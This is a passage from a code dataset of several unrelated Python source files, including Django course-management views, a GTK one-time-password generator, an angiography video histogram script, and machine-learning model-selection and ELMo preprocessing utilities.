{table_short_name} для всех {quotes_number} расценок\",\n f\"нет ни одного атрибута\")\n return None\n variable_attributes = {}\n for attribute in attributes:\n attribute_values = get_values_attribute_for_table(db, attribute, table_id)\n if attribute_values and (len(attribute_values) < quotes_number\n or len(set(attribute_values)) > 1):\n variable_attributes[attribute] = tuple(set(attribute_values))\n # ic(attribute, variable_attributes[attribute])\n return variable_attributes\n\n\nif __name__ == '__main__':\n import os\n from icecream import ic\n\n db_path = r\"F:\\Kazak\\GoogleDrive\\Python_projects\\DB\"\n db_name = os.path.join(db_path, \"quotes_test.sqlite3\")\n ic(db_name)\n\n table = (13, '2', '4.8-243')\n with dbTolls(db_name) as dbt:\n ua = get_db_attributes_for_table(dbt, table[2])\n ic(ua)\n","repo_name":"e2e4Konstantin/PSM_Parsing","sub_path":"update_tables_options/db_attributes.py","file_name":"db_attributes.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21814199316","text":"#!/usr/bin/env python\n\n#\n#\n#\n#\n#\n\n#\n# IMPORT SOURCES:\n#\n#\n\n#\n# Get taxa from anatomical structure.\n#\n\n# PRE-CODE\nimport faulthandler\nfaulthandler.enable()\n\n# IMPORTS\n\n# Imports for recognizing modules.\nimport os\nimport sys\nsys.path.append(os.path.join(os.path.dirname(__file__), \"../../..\"))\n\n# Import modules.\nfrom gnomics.objects.user import User\nimport gnomics.objects.anatomical_structure\nimport gnomics.objects.taxon\n\n# Other imports.\nimport json\nimport requests\nimport timeit\n\n# MAIN\ndef main():\n anatomical_structure_taxon_unit_tests(\"UBERON_0003097\")\n \n# Get taxa.\ndef get_taxa(anatomical_structure, user=None):\n taxa_array = []\n ids_completed = []\n \n for iden in gnomics.objects.auxiliary_files.identifier.filter_identifiers(anatomical_structure.identifiers, [\"uberon\", \"uberon id\", \"uberon identifier\"]):\n if iden[\"identifier\"] not in ids_completed:\n \n ids_completed.append(iden[\"identifier\"])\n \n proc_id = iden[\"identifier\"]\n if \":\" in proc_id:\n proc_id = proc_id.replace(\":\", \"_\")\n \n base = \"http://kb.phenoscape.org/api/taxon/\"\n ext = \"with_phenotype?entity=%3Chttp%3A%2F%2Fpurl.obolibrary.org%2Fobo%2FBFO_0000050%3E%20some%20%3Chttp%3A%2F%2Fpurl.obolibrary.org%2Fobo%2F\" + str(proc_id) + \"%3E&quality=%3Chttp%3A%2F%2Fpurl.obolibrary.org%2Fobo%2FPATO_0000052%3E&parts=false&limit=20&offset=0&total=false\"\n\n r = requests.get(base+ext, headers={\"Content-Type\": \"application/json\"})\n\n if not r.ok:\n #r.raise_for_status()\n #sys.exit()\n print(\"Something went wrong.\")\n else:\n\n decoded = json.loads(r.text)\n for result in decoded[\"results\"]:\n vto_id = result[\"@id\"].split(\"/obo/\")[1]\n sci_name = result[\"label\"]\n\n temp_taxon = gnomics.objects.taxon.Taxon(identifier = vto_id, identifier_type = \"VTO ID\", source = \"Phenoscape Knowledgebase\")\n gnomics.objects.taxon.Taxon.add_identifier(temp_taxon, identifier = sci_name, identifier_type = \"Scientific Name\", language = \"la\", source = \"Phenoscape Knowledgebase\")\n taxa_array.append(temp_taxon)\n \n return taxa_array\n \n# UNIT TESTS\ndef anatomical_structure_taxon_unit_tests(uberon_id):\n uberon_anat = gnomics.objects.tissue.Tissue(identifier = uberon_id, identifier_type = \"UBERON ID\", source = \"Phenoscape Knowledgebase\")\n \n start = timeit.timeit()\n getting_taxa = get_taxa(uberon_anat)\n end = timeit.timeit()\n print(\"TIME ELAPSED: %s seconds.\" % str(end - start))\n print(\"\\nGetting taxon identifiers from UBERON identifier (%s):\" % uberon_id)\n for taxa in getting_taxa:\n for iden in taxa.identifiers:\n print(\"- %s (%s)\" % (str(iden[\"identifier\"]), iden[\"identifier_type\"]))\n\n# MAIN\nif __name__ == \"__main__\": main()","repo_name":"Superraptor/Gnomics","sub_path":"gnomics/objects/interaction_objects/anatomical_structure_taxon.py","file_name":"anatomical_structure_taxon.py","file_ext":"py","file_size_in_byte":2983,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"20689305875","text":"from django.shortcuts import render, redirect,reverse, get_object_or_404\nfrom .models import Course,Message,EnrollTime\nfrom .forms import NewCourse, NewPost, NewUser\nfrom django.contrib.auth.decorators import login_required, user_passes_test\nfrom django.contrib.auth.models import User,Group\nfrom datetime import datetime,timedelta\nfrom django.contrib import messages\n# Create your views here.\n\n\n'''Not views, just helper functions'''\ndef group(name,request):\n\treturn request.user.groups.filter(name=name).exists()\n\t\n\ndef is_professor(user):\n\treturn 'Professor' == user.groups.all()[0].name\n\ndef is_student(user):\n\treturn 'Student' == user.groups.all()[0].name\n\t\ndef is_admin(user):\n\treturn 'admin'== user.username\n\t\n\t\n\t\n'''Views'''\n\n\t\n@login_required\ndef home(request):\n\t'''Home page'''\n\n\tposts= Message.objects.exclude(timestamp__lt=(datetime.now()-timedelta(days=1)))\n\treturn render( \n\t\trequest, 'home.html' , \n\t\tcontext = { 'courses':courses , \n\t\t'student':group('Student',request),'professor':group('Professor',request),'posts':posts}\n\t)\n\n\n@login_required\n@user_passes_test(is_student,'home','')\ndef courses(request):\n\t'''Page with all the courses in which student has enrolled'''\n\t\n\tcourses= Course.objects.filter(student__username=request.user.username)\n\treturn render( \n\t\trequest, \n\t\t'courses.html' , \n\t\tcontext = {'courses':courses,'student':group('Student',request)} \n\t)\n\t\n\n@login_required\t\ndef allcourses(request):\n\tcourses=Course.objects.all()\n\treturn render(\n\t\trequest, \n\t\t'allcourses.html',\n\t\tcontext = {'courses':courses,'student':group('Student',request),'professor':group('Professor',request)}\n\t)\n\t\n\n@login_required\t\ndef courseDetail(request,pk):\n\tcourse = get_object_or_404(Course,pk=pk)\n\tposts= Message.objects.filter(course=course)\n\t\n\tfull =(course.student.all().count()==course.limit)\n\t#If the user is a student\n\tif request.user.groups.all() and 'Student' == request.user.groups.all()[0].name:\n\t\n\t\tenrolled=request.user in course.student.all()\n\t\t#getting enroll time for the student if he is enrolled in the course\n\t\tif enrolled:\n\t\t\tenrollt=EnrollTime.objects.filter(relcourse=course).filter(stud=request.user)[0].enrolltime\n\t\telse:\n\t\t\tenrollt=datetime.now()\n\t\t\t\n\t\t#This queryset contains messages only after the enrollement time\n\t\tmsg_stud=Message.objects.filter(course=course).filter(timestamp__gt=enrollt)\n\t\t\n\t\treturn render(\n\t\t\trequest, \n\t\t\t'course_student.html',\n\t\t\tcontext = {'course':course,'enrolled':enrolled,'posts':msg_stud,'student':group('Student',request),'full':full}\n\t\t)\n\t\n\t#If the user is professor\n\telse:\n\t\n\t\t#If he is the course professor\n\t\tif request.user == course.professor:\n\t\t\n\t\t\tif request.method==\"POST\":\n\t\t\t\tform=NewPost(request.POST)\n\t\t\n\t\t\t\tif form.is_valid():\n\t\t\t\t\ttitle=form.cleaned_data['title']\n\t\t\t\t\tcontent=form.cleaned_data['content']\n\t\t\t\t\t\n\t\t\t\t\tmessage=Message(title=title,content=content,course=request.user.courses)\n\t\t\t\t\tmessage.save()\n\t\t\t\t\t\n\t\t\t\t\tform=NewPost()\n\t\t\t\t\t\n\t\t\t\t\treturn redirect('course-detail',course.name)\n\t\t\t\t\t\n\t\t\telse:\n\t\t\t\tform = NewPost()\n\n\t\t\treturn render(\n\t\t\t\trequest,\n\t\t\t\t'course_professor.html',\n\t\t\t\t context={'form':form,'posts':posts,'course':course,'check':request.user == course.professor,'professor':True}\n\t\t\t)\n\t\t\t\n\t\t# If he is not the course professor\n\t\telse:\n\t\t\treturn render(\n\t\t\t\trequest , \n\t\t\t\t'course_professor.html',\t\t\t\t\n\t\t\t\tcontext={'course':course,'professor':True,}\n\t\t\t)\n\t\t\n\t\t\t\t\n#proxy view for enrolling into a course\n@login_required\n@user_passes_test(is_student,'home','')\ndef courseEnroll(request,pk):\n\tcourse = get_object_or_404(Course,pk=pk)\n\t\n\tcourse.student.add(request.user)\n\tcourse.save()\n\t\n\ttime=EnrollTime(stud=request.user,relcourse=course)\n\ttime.save()\n\treturn redirect( 'course-detail', course.name)\n\t\n\n#proxy view for dropping out of a courses\n@login_required\t\n@user_passes_test(is_student,'home','')\ndef courseDrop(request,pk):\n\tcourse = get_object_or_404(Course,pk=pk)\n\t\n\tcourse.student.remove(request.user)\n\tcourse.save()\n\t\n\ttime=EnrollTime.objects.filter(relcourse=course).filter(stud=request.user)[0]\n\ttime.delete()\n\t\n\treturn redirect( 'course-detail', course.name)\n\n\n#proxy view for deleting a course\n@login_required\t\n@user_passes_test(is_professor,'home','')\ndef courseDelete(request,pk):\n\tcourse=get_object_or_404(Course,pk=pk)\n\tif course.professor==request.user:\n\t\tcourse.delete()\n\t\treturn redirect('new-course')\n\telse:\n\t\treturn redirect('home')\n\n\n@login_required\n@user_passes_test(is_professor,'home','')\ndef newCourse(request):\n\n\tif request.method=='POST':\n\t\tform=NewCourse(request.POST)\n\t\n\t\tif form.is_valid():\n\t\t\tname=request.POST.get('name')\n\t\t\tlimit=request.POST.get('limit')\n\t\t\t\n\t\t\tif Course.objects.filter(name=name).exists():\n\t\t\t\tform=NewCourse()\n\t\t\t\tcourse=Course.objects.filter(name=name)\n\t\t\t\tmessages.add_message(request,messages.ERROR, 'Course with this name has already been offered by'+course.professor.first_name+course.professor.last_name)\n\t\t\t\treturn redirect('new-course')\n\t\t\telse:\n\t\t\t\tcourse=Course(name=name,professor=request.user,limit=limit)\n\t\t\t\tcourse.save()\n\t\t\t\tmessages.add_message(request,messages.INFO, 'Created a new course')\n\n\t\t\t\treturn redirect(\n\t\t\t\t\t'course-detail',\n\t\t\t\t\tcourse.name\n\t\t\t\t)\n\telse:\n\t\tform=NewCourse()\t\n\t\n\treturn render( \n\t\trequest, \n\t\t'new_course.html',\n\t\tcontext = {'form':form,'professor':True}\n\t)\n\t\n\n#proxy view for deleting a message\n@user_passes_test(is_professor,'home','')\ndef msgDelete(request,pk):\n\tmessage=get_object_or_404(Message,pk=pk)\n\tmessage.delete()\n\t\n\treturn redirect(\n\t\t'course-detail',\n\t\trequest.user.courses\n\t)\n\t\n\t\n\t\n#view for admin to create new user\n@user_passes_test(is_admin,'home','')\ndef newUser(request):\n\tif request.method==\"POST\":\n\t\tform=NewUser(request.POST)\n\t\tif form.is_valid():\n\t\t\tif not User.objects.filter(username=form.cleaned_data.get('username')).exists():\n\t\t\t\tuser=form.save()\n\t\t\t\tuser.refresh_from_db()\n\t\t\t\tgroup=Group.objects.get(name=form.cleaned_data.get('group'))\n\t\t\t\tfname=form.cleaned_data.get('fname')\n\t\t\t\tlname=form.cleaned_data.get('lname')\n\t\t\t\tuser.first_name=fname\n\t\t\t\tuser.last_name=lname\n\t\t\t\tgroup.user_set.add(user)\n\t\t\t\tuser.save()\n\t\t\t\tmessages.add_message(request,messages.INFO,'New User added')\n\t\t\t\treturn redirect(\n\t\t\t\t\t'home'\n\t\t\t\t\t)\n\t\t\t\n\t\t\telse:\n\t\t\t\treturn redirect('new-user')\n\t\telse:\n\t\t\treturn render(request,\n\t\t\t\t'new_user.html',\n\t\t\t\tcontext={'form':form}\n\t\t\t\t)\n\telse:\n\t\tform=NewUser()\n\t\treturn render( \n\t\t\trequest,\n\t\t\t'new_user.html',\n\t\t\tcontext={'form':form}\n\t\t\t)\n","repo_name":"lavishchauhan321/miniMoodle","sub_path":"MiniMoodle-master/moodle/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74620573047","text":"\"\"\"\r\nGregg Hebert – 1657892 – NSM - Undergraduate\r\nMubashir Khan - 1521657 - NSM - Undergraduate\r\nGeorge Coll Rodriguez - 1529011 – NSM – Undergraduate\r\n\r\nInstructions:\r\n- Make sure the two .mp4 files are in the same folder as this script.\r\n- Make sure all necessary libraries are installed.\r\n- Run the program.\r\n- Once the first video ends, it will close automatically.\r\n- Close the first histogram after you are done observing it by clicking the 'X' in the top right corner.\r\n- The second set of video and histogram will persue automatically.\r\n- Once the second video ends, it will close automatically.\r\n- Close the second histogram after you are done observing it by clicking the 'X' in the top right corner.\r\n- Two .png files of the histograms will be added to the folder after closing the last histogram.\r\n\r\nNote: press q at any time while the video is running to stop script.\r\n\"\"\"\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport cv2\r\nimport time\r\n\r\n# parameters(the .mp4 video, number of frames in video (can be adjusted), type of perfusion(as string))\r\n\r\n\r\ndef getData(capture, numFrames, typePerfusion):\r\n i = 0\r\n x, y = [], []\r\n\r\n while True:\r\n (grabbed, frame) = capture.read()\r\n\r\n if not grabbed:\r\n break\r\n # Resize frame to width, if specified.\r\n if resizeWidth > 0:\r\n (height, width) = frame.shape[:2]\r\n resizeHeight = int(float(resizeWidth / width) * height)\r\n frame = cv2.resize(frame, (resizeWidth, resizeHeight),\r\n interpolation=cv2.INTER_AREA)\r\n\r\n # Normalize histograms based on number of pixels per frame.\r\n numPixels = np.prod(frame.shape[:2])\r\n\r\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n cv2.imshow(typePerfusion + ' Perfusion', gray)\r\n\r\n x.append(i/numFrames)\r\n\r\n # append the number of white pixels to array y\r\n y.append(np.count_nonzero(gray == 255))\r\n\r\n # plot in real-time with video\r\n ax.plot(x, y, color='b')\r\n fig.canvas.draw()\r\n\r\n i += 1\r\n\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\n capture.release()\r\n cv2.destroyAllWindows()\r\n fig.savefig(typePerfusion+'.png')\r\n plt.show()\r\n\r\n\r\ncapture1 = cv2.VideoCapture('Normal_Perfusion.mp4')\r\n\r\ncolor = 'gray'\r\ntypePerfusion = 'Normal'\r\n\r\n# rough estimate of amount of frames/sec\r\nnumFrames = 15\r\n\r\n# set width - can be adjusted fit your screen\r\nresizeWidth = 700\r\n\r\n# Label the plot axies and title\r\nfig = plt.figure(\"Angiography Normal Perfusion Histrogram\")\r\nax = fig.add_subplot(111)\r\nax.set_title('Normal Perfusion')\r\nax.set_xlabel('Time (s)')\r\nax.set_ylabel('Signal Strength (px count)')\r\nfig.show()\r\ngetData(capture1, numFrames, typePerfusion)\r\n\r\ncapture2 = cv2.VideoCapture('Abnormal_Perfusion.mp4')\r\n\r\ncolor = 'gray'\r\ntypePerfusion = 'Abnormal'\r\nresizeWidth = 700\r\n\r\n# Label the plot axies and title\r\nfig = plt.figure(\"Angiography Abnormal Perfusion Histogram\")\r\nax = fig.add_subplot(111)\r\nax.set_title('Abnormal Perfusion')\r\nax.set_xlabel('Time (s)')\r\nax.set_ylabel('Signal Strength (px count)')\r\nfig.show()\r\ngetData(capture2, numFrames, typePerfusion)\r\n","repo_name":"gregghebert/Angiography_Simulator","sub_path":"Angiography_Simulator.py","file_name":"Angiography_Simulator.py","file_ext":"py","file_size_in_byte":3201,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10297496890","text":"import yaml,gi,time,pyotp,subprocess,argparse,sys,os\ngi.require_version(\"Gtk\", \"3.0\")\ngi.require_version(\"Gdk\", \"3.0\")\nfrom gi.repository import Gdk,Gtk,GObject,GLib\nfrom otpversion import program_version\n\nclass OtpSettings:\n def __init__(self):\n homedir = os.environ[\"HOME\"]\n xdg_config_home = os.environ.get(\"XDG_CONFIG_HOME\",f\"{homedir}/.config\")\n otp_settings_home = xdg_config_home + \"/otpgui\"\n otp_settings_file = otp_settings_home + \"/settings.yml\"\n if not os.path.isdir(otp_settings_home):\n os.makedirs(otp_settings_home)\n if not os.path.isfile(otp_settings_file):\n self.otp_settings_data = {\"config_file\": f\"{otp_settings_home}/otp.yml\",\"encryption_method\": \"plain\"}\n with open(otp_settings_file, 'w') as f:\n yaml.dump(self.otp_settings_data, f)\n else:\n try:\n with open(otp_settings_file, 'r') as f:\n self.otp_settings_data = yaml.safe_load(f)\n except yaml.YAMLError as exc:\n print(f\"Cannot read settings file: {exc}\")\n self.otp_settings_data = None\n\n if not os.path.isfile(self.otp_settings_data['config_file']):\n default_config_file = {\"otp\": \n { \"default\":\n {\n \"name\": \"default tooltip\",\n \"genstring\":\"ABCDEFGHIJKLMNOP\"\n }\n }\n }\n with open(self.otp_settings_data['config_file'], 'w') as f:\n yaml.dump(default_config_file, f)\n\n def settings(self):\n return self.otp_settings_data\n\nclass OtpStore:\n def __init__(self,config_file,encryption_method):\n self.config_file = config_file\n self.sops_cmd = f\"sops -d --extract\"\n self.encryption_method=encryption_method\n try:\n with open(config_file, 'r') as file:\n config_yaml = yaml.safe_load(file)\n self.config_data = config_yaml['otp']\n self.otplist = sorted(config_yaml['otp'])\n except yaml.YAMLError as exc:\n print(f\"Error in configuration file: {exc}\")\n self.config_data = None\n self.otplist = None\n\n def getlabel(self,label):\n self.label = label\n self.tooltip = self.config_data[label]['name']\n\n def getgenerator(self):\n if self.encryption_method == \"sops\":\n gensel = f\"['otp']['{self.label}']['genstring']\"\n gen_decrypt = subprocess.run(f\"{self.sops_cmd} \\\"{gensel}\\\" {self.config_file}\",capture_output=True,shell=True,universal_newlines=True,check=True)\n self.genstring = gen_decrypt.stdout\n elif self.encryption_method == \"plain\":\n self.genstring = self.config_data[self.label]['genstring']\n\n def otpcode(self):\n totp = pyotp.TOTP(self.genstring)\n return totp.now()\n\n def progress(self):\n return ((30-time.time()%30)/30)\nclass MyWindow(Gtk.Window):\n\n def __init__(self,otp):\n self.otp = otp\n Gtk.Window.__init__(self, title=\"OTP\")\n \n self.clipboard = Gtk.Clipboard.get(Gdk.SELECTION_CLIPBOARD)\n\n vbox = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=6)\n self.add(vbox)\n \n self.OtpCode = Gtk.Button.new_with_label(otp.otpcode())\n self.OtpCode.set_tooltip_text(otp.tooltip)\n self.OtpCode.connect(\"clicked\", self.on_otp_clicked)\n vbox.pack_start(self.OtpCode, True, True, 0)\n\n self.ProgressBar = Gtk.ProgressBar(fraction=otp.progress())\n vbox.pack_start(self.ProgressBar, True, True, 0)\n\n self.timeout_id = GLib.timeout_add(1000, self.on_timeout)\n self.activity_mode = False\n \n self.OtpLabelStore = Gtk.ListStore(str)\n for key in otp.otplist:\n self.OtpLabelStore.append([key])\n\n self.OtpCombo = Gtk.ComboBox.new_with_model(self.OtpLabelStore)\n self.OtpCombo.set_active(otp.otplist.index(otp.label))\n self.OtpCombo.connect(\"changed\", self.on_otp_changed)\n renderer_text = Gtk.CellRendererText()\n self.OtpCombo.pack_start(renderer_text, True)\n self.OtpCombo.add_attribute(renderer_text, \"text\", 0)\n vbox.pack_start(self.OtpCombo, False, False, 0)\n \n def on_timeout(self):\n new_value = self.otp.progress()\n self.ProgressBar.set_fraction(new_value)\n self.OtpCode.set_label(self.otp.otpcode())\n self.OtpCode.set_tooltip_text(self.otp.tooltip)\n return True\n \n def on_otp_changed(self, combo):\n tree_iter = combo.get_active_iter()\n if tree_iter is not None:\n model = combo.get_model()\n SelectedLabel = model[tree_iter][0]\n self.otp.getlabel(SelectedLabel)\n self.otp.getgenerator()\n \n def on_otp_clicked(self,OtpCode):\n self.clipboard.set_text(self.OtpCode.get_label(), -1)\n\ndef main():\n otp_settings_init = OtpSettings()\n otp_settings = otp_settings_init.settings()\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-c\",\"--config-file\", help=\"Path to otp.yml configuration file\", type=str,default=otp_settings['config_file'])\n parser.add_argument(\"-e\",\"--encryption-method\", help=\"Encryption method to use.\",choices=[\"plain\", \"sops\"],default=otp_settings['encryption_method'])\n parser.add_argument(\"-i\",\"--interface\", help=\"Interface to use. Default: gtk\",choices=[\"gtk\", \"script\"], default=\"gtk\")\n parser.add_argument(\"-l\",\"--label\", help=\"Otp label to display on startup or script. Default to first label (sorted alphabetical) in configuration file.\", type=str)\n parser.add_argument(\"-v\",\"--version\", help=\"show version\",action=\"store_true\")\n\n args = parser.parse_args()\n if args.version:\n print(f\"{program_version}\")\n sys.exit(0)\n config_file = args.config_file\n encryption_method = args.encryption_method\n interface = args.interface\n otplabel = args.label\n\n if encryption_method == \"sops\":\n try:\n subprocess.run(f\"sops -v\",capture_output=True,shell=True,universal_newlines=True,check=True)\n except subprocess.CalledProcessError as err:\n print(\"Cannot run sops executable. Is it in your PATH?\")\n print(f\"{err}\")\n sys.exit(1)\n otp = OtpStore(config_file=config_file,encryption_method=encryption_method)\n if otplabel == None:\n otp.getlabel(otp.otplist[0])\n else:\n try:\n otp.getlabel(otplabel)\n except KeyError as err:\n print(f\"Label not found\\nError: {err}\")\n sys.exit(1)\n otp.getgenerator()\n if interface == \"gtk\":\n win = MyWindow(otp)\n win.connect(\"destroy\", Gtk.main_quit)\n win.show_all()\n Gtk.main()\n elif interface == \"script\":\n print(\"OTP_LABEL={otplabel}\\nOTP_CODE={otpcode}\".format(otplabel=otp.label,otpcode=otp.otpcode()))\n\nif __name__ == '__main__':\n main()\n","repo_name":"gianluca-mascolo/otpgui","sub_path":"otpgui.py","file_name":"otpgui.py","file_ext":"py","file_size_in_byte":7119,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"17599956495","text":"# model selector class to choose models\n\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport math as math\nimport scikitplot as skplt\n\nfrom sklearn.model_selection import cross_val_score, cross_validate\nfrom sklearn.metrics import classification_report\nfrom sklearn.ensemble import AdaBoostClassifier, RandomForestClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.neural_network import MLPClassifier\nfrom xgboost import XGBClassifier\n\nfrom imblearn.pipeline import Pipeline\nfrom sklearn.utils.class_weight import compute_class_weight\n\nseed = 7\n\nclass ModelSelector():\n\n def __init__(self, preprocessor,cv_state =True, sampler=None, instance_name=None):\n # initialise class with predetrmined models and tests, maybe add functions to add/change them afterwards?\n # add option to use a sampler (default = none)\n self.results = []\n self.name = []\n self.preprocessor = preprocessor\n self.sampler = sampler\n self.cv = []\n self.labels = []\n self.cv_state = cv_state\n self.scoring = {'precision':'precision',\n 'recall': 'recall',\n 'f1score':'f1',\n 'roc auc':'roc_auc'}\n self.models = [\n ('LR', LogisticRegression(random_state=seed, max_iter = 1000, n_jobs=-1)),\n ('KNN', KNeighborsClassifier(n_jobs = -1)),\n ('RF', RandomForestClassifier(random_state=seed, n_jobs = -1)),\n ('ADAB', AdaBoostClassifier(random_state=seed)),\n ('XGB', XGBClassifier(random_state=seed, n_jobs = -1)),\n ('SVC', SVC(random_state=seed)),\n ('GNB', GaussianNB()),\n ('MLP', MLPClassifier(random_state=seed))\n ]\n self.instance_name = instance_name\n self.tests = [\"test_\"+elm for elm in self.scoring.keys()]\n self.best_results= []\n\n\n # function for determining the cvs, if True do cv for each ref_num\n def __cv__(self, X):\n if self.cv_state == True:\n self.labels = X.ref_number.values\n self.cv = [(np.where(self.labels != label)[0], np.where(self.labels == label)[0]) for label in np.unique(self.labels)]\n else:\n self.cv = 5\n\n\n # fit each model and do cv and record cvs and names\n def select_model(self, X, y, state):\n self.cv_state = state\n self.__cv__(X)\n for name, model in self.models:\n model_pipe = Pipeline([(self.preprocessor.__class__.__name__,self.preprocessor),\n (self.sampler.__class__.__name__,self.sampler),(\"name\",model)])\n cv_results = cross_validate(model_pipe, X, y, cv=self.cv, scoring=self.scoring, n_jobs=-1, return_train_score=True)\n self.results.append(cv_results)\n self.name.append(name)\n\n def plot_selection(self):\n # plot the test scores for each test and each model\n plt.figure(figsize = (15,8))\n plt.suptitle('Algorithm Comparison for ' + self.instance_name)\n for idx, test in enumerate(self.tests):\n temp_results = [self.results[i][test] for i in range(len(self.results))]\n plt.subplot(1,len(self.tests),idx+1)\n sns.boxplot(y = temp_results, x = self.name)\n plt.title(test)\n plt.xticks(rotation = 90)\n plt.ylim(0,1.05)\n plt.tight_layout()\n plt.subplots_adjust(top=0.85)\n\n def get_scores(self, top = 3):\n # get test scores for top 3 tests for each measure and return them as a dataframe\n for idx, test in enumerate(self.tests):\n temp_results = [np.mean(self.results[i][test]) for i in range(len(self.results))]\n test_name = [test for i in range(len(self.name))]\n instance_name = [self.instance_name for i in range (len(self.name))]\n temp_best = sorted(zip(temp_results,self.name,test_name, instance_name), reverse = True)[:top]\n self.best_results.append(temp_best)\n\n test= pd.DataFrame()\n for i in range(np.array(self.best_results).shape[0]):\n test= pd.concat([test, pd.DataFrame(np.array(self.best_results)[i])], axis=0)\n test.columns = [\"test_result\",\"model\",\"test\", \"instance_name\"]\n test.test_result = test.test_result.astype(float)\n test.set_index([\"instance_name\",\"test\",\"model\"], inplace = True)\n return(test)\n\n\ndef modified_ratio(X, y, threshold = 0):\n # for every position in the predictions calculate a ratio of how myn positions were modified\n # print out those over threshold and return them as a dataframe\n modified_pos = []\n modified_pos_ratio = []\n y_pred_ref_pos = X.ref_pos.values\n ratio_df = pd.DataFrame(pd.concat([pd.Series(y),pd.Series(y_pred_ref_pos)],axis=1))\n ratio_df.columns =[\"predicted\",\"ref_pos\"]\n for elm in ratio_df.ref_pos.unique():\n msk = ratio_df[ratio_df.ref_pos == elm]\n ratio = round((len(msk[msk.predicted == 1])/len(msk))*100,2)\n if ratio > threshold:\n print(\"Ratio of modified Reads for ref_pos \" + str(elm) + \" is :\" + str(ratio))\n modified_pos.append(elm)\n modified_pos_ratio.append(ratio)\n df = pd.DataFrame({\"ratio\":modified_pos_ratio}, index = modified_pos )\n df.index.rename(\"ref_pos\",inplace=True)\n return (df)\n\n\ndef feature_importances (model, preprocessor, X, y, debug = False, custom_feature_state = False, custom_feature_list=None):\n # plot feature importances with predefined model and preprocessor, get feature names either from input dataframe\n # if all are used or define a custom one if subset is used\n if custom_feature_state:\n feature_names = custom_feature_list\n else:\n cat_features = list(X.columns[X.dtypes == \"category\"])\n numeric_features = list(X.columns[X.dtypes == \"float\"])\n cat = None\n if \"base_1\" in X.columns:\n bases = [\"_A\",\"_C\",\"_T\",\"_G\"]\n cat = [elm + base for elm in cat_features for base in bases ]\n feature_names = numeric_features + cat\n\n X_trans = preprocessor.fit_transform(X)\n\n if debug:\n print(feature_names)\n print(len(feature_names))\n model.fit(X_trans, y)\n\n skplt.estimators.plot_feature_importances(model, feature_names=feature_names, max_num_features=10)\n plt.xticks(rotation=90);\n\n\n\ndef evaluation (model,X, y, thresh = 30):\n # for model produce confusion matrix, classification report andmodified ratio\n y_pred=model.predict(X)\n skplt.metrics.plot_confusion_matrix(y, y_pred, figsize=(10,10), text_fontsize=20)\n print(\"-\"*30)\n print(classification_report(y,y_pred))\n print(\"-\"*30)\n ratio = modified_ratio(X,y_pred, thresh)\n print(\"-\"*30)\n return ratio\n\n\ndef yeast_prediction(preprocessor, X, y, yeast_df, model, model_name):\n #use test data to fit inputted model and predict the yeast data, bar graph for ratio of wt and ko in predicted\n # states, to see if either condition has more modified than the other\n X_trans = preprocessor.fit_transform(X)\n X_yeast_trans = preprocessor.fit_transform(yeast_df)\n model.fit(X_trans, y)\n y_yeast_pred = model.predict(X_yeast_trans)\n temp_df = pd.DataFrame(yeast_df[\"file_type\"])\n temp_df[\"modified_status\"] = y_yeast_pred\n yeast_group = temp_df.file_type.groupby(temp_df[\"modified_status\"]\n ).value_counts(normalize=True).rename(\"wt_ko_ratio\").reset_index()\n\n sns.barplot(data = yeast_group, x = \"modified_status\",y = \"wt_ko_ratio\", hue = \"file_type\"\n ,edgecolor=\"grey\" , linewidth = 2.5 );\n yeast_group.sort_values([\"modified_status\",\"file_type\"],inplace=True)\n yeast_group.set_index([\"modified_status\",\"file_type\"], inplace=True)\n yeast_group = pd.concat([yeast_group], keys=[model_name], names=['Model'])\n return yeast_group\n","repo_name":"Karsten-Yan/ky-nf-capstone","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74535121529","text":"import numpy as np\nimport pandas as pd\nimport pickle\nimport spacy\nimport tensorflow as tf\nimport tensorflow.compat.v1 as tf1\nimport tensorflow_hub as hub\nimport time\n\n\nfrom data_handler import Data_Handler\n\n\nnlp = spacy.load('en', disable=['parser', 'ner'])\n\nelmo = hub.load(\"https://tfhub.dev/google/elmo/3\")\n\ndef lemmatization(texts):\n '''\n Takes in text to be vectorized and lemmatizes it for the next steps.\n '''\n\n output = []\n for i in texts:\n s = [token.lemma_ for token in nlp(i)]\n output.append(' '.join(s))\n return output\n\ndef elmo_data_prep():\n '''\n Takes in data to be vectorized and goes through a cleaning and\n lemmatization process so it plays licely with ELMo.\n '''\n\n start = time.time()\n print(time.asctime(time.localtime(start)))\n wrangler = Data_Handler('data/cleaned_data.csv')\n df = wrangler.get_top_num(15)\n stops = wrangler.stop_words\n \n X = df['description']\n y = df['variety']\n \n # Scrubbing methods\n punctuation = ',.!\"#$%&()*+-/:;<=>?@[\\\\]^_`{|}~'\n df['description'] = df['description'].apply(lambda x: ''.join(ch for ch in str(x) if ch not in set(punctuation)))\n df['description'] = df['description'].str.lower()\n df['description'] = df['description'].str.replace(\"[0-9]\", \" \")\n df['description'] = df['description'].apply(lambda x:' '.join([word for word in x.split() if word not in stops]))\n df['description'] = lemmatization(df['description'])\n\n # Saves data to new .csv\n df.to_csv('data/elmo_prepped_data.csv')\n print(df.head())\n print(time.time() - start)\n\n\ndef elmo_vectors(x):\n '''\n Goes through prepped data and vectorizes it returning embeddings.\n '''\n \n cycle = 